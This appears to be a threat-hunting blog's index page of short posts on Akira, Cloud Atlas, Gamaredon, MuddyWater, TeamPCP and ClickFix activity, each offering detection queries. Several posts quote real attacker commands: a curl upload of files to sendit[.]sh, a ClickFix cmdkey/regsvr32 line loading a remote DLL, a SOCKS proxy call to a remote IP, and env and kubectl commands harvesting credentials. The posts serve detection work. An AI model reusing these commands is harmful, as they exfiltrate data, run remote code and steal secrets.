Posts

396. Another Cloud Storage Abused by Akira Affiliates for Exfiltration

Image
Hello everyone! To be honest, after nearly 400 posts, finding something interesting in public reports has become a bit more challenging. Nevertheless, it’s still possible, and today we’ll once again talk about Exfiltration to Cloud Storage (T1567.002) . This time, the post is sponsored by our partners at Akira , and the following excerpt from a report caught my attention: “Next, the threat actor used the Microsoft Edge browser to access Bing, and search for the term ‘eayupload’ before settling on Easyupload.io, a website that provides access to file uploads via drag-and-drop.” As you can see, the attackers used yet another cloud storage service to upload the data they had collected. Access to such services can be proactively blocked, or you can monitor for suspicious connections to them: event_type: "dnsreq" AND dns_rname: "easyupload.io" Attackers are increasingly relying on legitimate tools and services, so understanding exactly which ones they may use can become...
Post a Comment
Read more

395. Using Folders Associated with Cloud Atlas for Threat Hunting

Image
Hello everyone! In some cases threat actors use very interesting folders to drop malware and tools thay use - and it can be a great target for hunting! Let's look at an example. This time it's Cloud Atlas (Cloud Werewolf, Inception). If we look through the report, we can see that the adversary leveraged multiple interesting folders to store malicious files and tools, for example: C:\Windows\ime C:\Windows\System32\ime C:\Windows\pla C:\Windows\inf C:\Windows\migration C:\Windows\System32\timecontrolsvc C:\Windows\SKB C:\Windows\LiveKernelReports C:\Windows\branding As you can see, these folder are not very common for legitimate executables, so we can use this information to build our hunting query: event_type: "processcreatewin" AND proc_file_path: ("Windows\\ime" OR "Windows\\System32\\ime" OR "Windows\\pla" OR "Windows\\inf" OR "Windows\\migration" OR "Windows\\System32\\timecontrolsvc" OR "Windows\\S...
Post a Comment
Read more

394. Hunting for PySoxy: Another Tool Delivered via ClickFix

Image
Hello everyone! Today we'll look at another tool delivered by threat actors via ClickFix . And this time it's a 10-year-old open-source Python SOCKS5 proxy - PySoxy . So, according to ReliaQuest report , the adversary leveraged interactive PowerShell access to download Python tooling to C:\ProgramData .  The following command was executed to run the tool: python.exe b64.pyc -ssl -remote_port 443 -remote_ip 167.99.158[.]97 The tool was identified as PySoxy. As you can see, there're a few interesting command line parameters we can use to build a hunting query, for example: event_type: "processcreatewin" AND cmdline: ("remote_port" AND "remote_ip")  See you soon!
Post a Comment
Read more

393. Hunting for Recent Gamaredon Tactics, Techniques, and Procedures

Image
Hello everyone! Today we’ll take a look at several procedures observed in relatively recent Gamaredon (Disastrous Werewolf, Primitive Bear, Armageddon, Shuckworm, Aqua Blizzard) campaigns . As before, the attackers used phishing emails for initial access. The emails contained archives exploiting the CVE-2025-8088 vulnerability in WinRAR. After successful exploitation, a malicious VBS file - for example, 1_13_4_1882_18.03.2026.vbs  - was copied into %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\ . We can search for suspicious VBS file creation events in this folder: event_type: "filecreatewin" AND file_path: ("programs\\startup" AND *.vbs) Next, the VBS file downloads a malicious HTA file from Cloudflare Workers. For example, we can look for wscript.exe communications with the corresponding domains: event_type: "dnsreqwin" AND dns_rname: "workers.dev" AND proc_file_path: "wscript.exe" The HTA file is downloaded into the %TEMP...
Post a Comment
Read more

392. MuddyWater Abuses Sendit for Data Exfiltration

Image
Hello everyone! I really enjoy spotting various legitimate services that attackers abuse. Today we’ll look at another such example within the context of the Exfiltration to Cloud Storage technique (T1567.002) . According to this report, MuddyWater (Nebulous Werewolf, Seedworm, TEMP.Zagros, Static Kitten, Mercury, TA450, Cobalt Ulster, Earth Vetala, Mango Sandstorm, Boggy Serpens) abused the sendit[.]sh service for data exfiltration. The service allows uploading files up to 10 GB using the command line: curl.exe -F "file=@C:\Windows\Temp\<artifact>" hxxps://sendit[.]sh As with other similar services, you can look for suspicious communications with it - for example, outbound connections initiated by cURL: event_type: "dnsreqwin" AND dns_rname: "sendit.sh" AND proc_file_path: "curl.exe" See you soon!
Post a Comment
Read more

391. Hunting for TeamPCP's Stealer

Image
Hello everyone! What do I know about stealers? They seem to be very noisy! And today, we’ll once again see that in action using TeamPCP (Haze Wolf) as an example. This time , the stealer was implanted by attackers into three versions of the xinference package (2.6.0, 2.6.1, and 2.6.2). Essentially, it collects SSH keys, various credentials, environment variables, crypto wallets, and much more, then uses cURL for exfiltration. Let’s take a look at a couple of techniques the attackers used to obtain credentials. For example, they were interested in data stored in environment variables: env | grep AWS_ env | grep -i google env | grep -i gcloud env | grep -i azure This looks fairly suspicious from a detection perspective: event_type: processcreate* AND proc_file_path: "env" AND cmdline: ("grep" AND ("aws_" OR "google" OR "azure" OR "gcloud")) Another technique was abusing kubectl to obtain credentials: kubectl get secrets --all-n...
Post a Comment
Read more

390. A New ClickFix Variant Abuses Cmdkey

Image
Hello everyone! Today we’re going to look at another interesting variation of the Malicious Copy and Paste technique (T1204.004). This time, according to the report , the attackers prompted the victim to run the following command: C:\WINDOWS\system32\cmd.exe /c cmdkey /add:151.245.195[.]142 /user:guest && start regsvr32 /s \\151.245.195[.]142\hi\demo.dll & REM I am not a robot – Cloudflare ID: d7f5a3335794c434 As you can see, before registering a malicious library from a remote server using regsvr32.exe , the attackers use cmdkey.exe to store credentials for accessing that server. And yes, abusing cmdkey.exe can be a good hunting opportunity - we can look for suspicious events where credentials are added to the Windows Credential Manager: event_type: "processcreatewin" AND proc_file_path: "cmdkey.exe" AND cmdline: "add" See you soon!
Post a Comment
Read more